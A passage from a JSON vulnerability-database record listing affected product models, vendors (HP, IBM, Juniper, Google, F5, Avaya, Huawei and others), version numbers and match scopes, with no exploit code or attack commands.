"scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "10.00" }, { "model": "netscaler", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "9.3-66.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.23" }, { "model": "laserjet p4014 cb507a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.213.1" }, { "model": "bladecenter js43 with feature code", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7778-23x8446)0" }, { "model": "toolscenter suite", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.53" }, { "model": "unified communications series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.18" }, { "model": "junos space 11.4r5.5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "system storage ts2900 tape library", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0026" }, { "model": "junos 12.1r7-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "8.4-release-p12", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "netcool/system service monitor fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.014" }, { "model": "exalogic", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x2-22.0.6.2.0" }, { "model": "color laserjet m680 cz248a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "bbm for android", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.46" }, { "model": "fortianalyzer", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.5" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.6.0" }, { "model": "color laserjet enterprise cp4025 cc489a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.164.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "laserjet m3027 multifunction printer cb416a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "security information and event management hf11", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.3.2" }, { "model": "laserjet pro mfp m425dn/dw cf288a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "40020140919" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "junos 12.1r5-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x363071580" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.8" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.29" }, { "model": "asset manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.30" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.1" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.1.1" }, { "model": "content analysis system", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "vsphere storage appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "elan", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "8.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.15" }, { "model": "tivoli storage productivity center fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "netscaler", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "10.0" }, { "model": "laserjet m5035 multifunction printer q7831a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x46" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "2.2" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "msr2000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "email security gateway", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.8.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "aura presence services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "color laserjet printer series cb433a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "470046.230.6" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.3" }, { "model": "laserjet enterprise m712 series cf236a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7000" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.12" }, { "model": "tivoli netcool/system service monitor fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "communicator for ipad", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0.1" }, { "model": "color laserjet printer series q7535a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "300046.80.2" }, { "model": "data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "8.1.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.7" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "svn2200 v200r001c01hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "bladecenter js12 express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7998-60x)0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.12" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "laserjet multifunction printer series q3943a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "43459.310.2" }, { "model": "usg9500 v300r001c01spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "laserjet p4015 cb526a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.213.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "cms r16 r6", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "system x3200m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73271.42" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.115" }, { "model": "cit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.52" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "flashsystem 9840-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.3.2.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.12" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.0" }, { "model": "color laserjet cp3505 printer series ce491a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.160.2" }, { "model": "laserjet m5035 multifunction printer q7830a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "algo one", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "network connect", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.4.0.15779" }, { "model": "color laserjet cp3525 cc468a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.183.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6" }, { "model": "8.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura application server sip core pb5", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "view client", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "host agent for oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "mcp russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "66000" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "network connect", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.0.0.12141" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.159" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "ecns610 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.24" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.93" }, { "model": "color laserjet printer series q7495a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "470046.230.6" }, { "model": "a6600 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.817" }, { "model": "laserjet enterprise m602 series ce991a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6000" }, { "model": "f5000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "color laserjet cm6030 multifunction printer ce664a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "52.256.1" }, { "model": "9.2-release-p8", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.1" }, { "model": "color laserjet enterprise cp4025 cc489a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "network connect 7.4r9.1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vcsa", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "protection service for email", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "7.5" }, { "model": "color laserjet cp3525 cc471a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.183.1" }, { "model": "laserjet enterprise flow mfp m525c cf118a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos r11", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "laserjet enterprise color flow mfp m575c cd646a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "laserjet m3035 multifunction printer cb415a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "junos 10.4s13", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0" }, { "model": "data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "7.3" }, { "model": "laserjet cm3530 multifunction printer cc520a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.7" }, { "model": "sdn for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0" }, { "model": "oceanstor s5600t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x47" }, { "model": "espace iad v300r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.44" }, { "model": "color laserjet cp5525 ce708a 2302963 436070", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "pk family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1810v10" }, { "model": "color laserjet cp6015 q3935a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "3par service processor sp-4.2.0.ga-29.p002", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "3.1.10" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "laserjet enterprise m602 series ce993a 2302963 436082", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "600" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.126" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-2" }, { "model": "laserjet m4345 multifunction printer cb427a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6.1" }, { "model": "laserjet p4515 cb517a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "1.9" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "color laserjet cp5525 ce709a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "laserjet m5025 multifunction printer q7840a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.12" }, { "model": "oceanstor s5800t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "security network intrusion prevention system gx4002", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "oceanstor s5800t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "color laserjet cp6015 q3933a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "bladesystem c-class virtual connect", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.20" }, { "model": "color laserjet flow m680 cz250a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos 11.4r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vdi communicator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0.2" }, { "model": "color laserjet cp3505 printer series cb444a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.160.2" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.5.3" }, { "model": "icewall sso dfw r3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.10" }, { "model": "web security gateway", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.7" }, { "model": "color laserjet printer series cb432a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "470046.230.6" }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "horizon view client", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.3.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.7.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "color laserjet multifunction printer series q7519a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "400046.380.3" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90006.1.20" }, { "model": "flashsystem 9848-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.2" }, { "model": "malware analysis appliance", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "4.2.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.31" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.00" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.5.6.2" }, { "model": "junos os 12.1x47-d15", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.25" }, { "model": "junos 13.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vfabric application director", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9900" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.10" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.1.2" }, { "model": "cloud service automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.00" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cluster network/management switches", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "vma san gateway g5.5.1", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "flex system p260 compute node /fc efd9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "10.0-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.92743" }, { "model": "system storage ts2900 tape library", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0025" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8300" }, { "model": "color laserjet cm6040 multifunction printer q3938a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "chargeback manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.6" }, { "model": "fortianalyzer", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.2" }, { "model": "color laserjet m651 cz258a 2302963 436073", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5950" }, { "model": "tivoli netcool/system service monitor fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "vdi-in-a-box", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.3.4" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "flex system p260", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "tssc", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.15" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "0.9.7" }, { "model": "secblade fw family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "winscp", "scope": "eq", "trust": 0.3, "vendor": "winscp", "version": "5.5.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.42" }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "bbm for iphone", "scope": "ne", "trust": 0.3, "vendor": "rim", "version": "2.2.1.24" }, { "model": "vsphere sdk for perl", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "laserjet enterprise color mfp m880 a2w76a 2302963 436068", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "800" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.59" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.1" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uacos c4.4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "1.6" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "elog v100r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.2" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.0" }, { "model": "ata series analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.7" }, { "model": "flare experience for ipad", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.2.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.125" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.0.9.8" }, { "model": "laserjet enterprise p3015 ce528a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.186.1" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "1.3" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "idol speech software", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "10.7" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "color laserjet enterprise cp4525 cc494a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.7" }, { "model": "vcenter operations manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.8.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5.0" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "1.9.5" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.30" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.51" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364160" }, { "model": "fortianalyzer", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.4" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "msr50 g2 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "big-ip edge clients for linux", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7080" }, { "model": "dgs-1500-52", "scope": "eq", "trust": 0.3, "vendor": "d link", "version": "2.51.005" }, { "model": "junos 11.4r6-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "laserjet m9040 multifunction printer cc394a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "cms 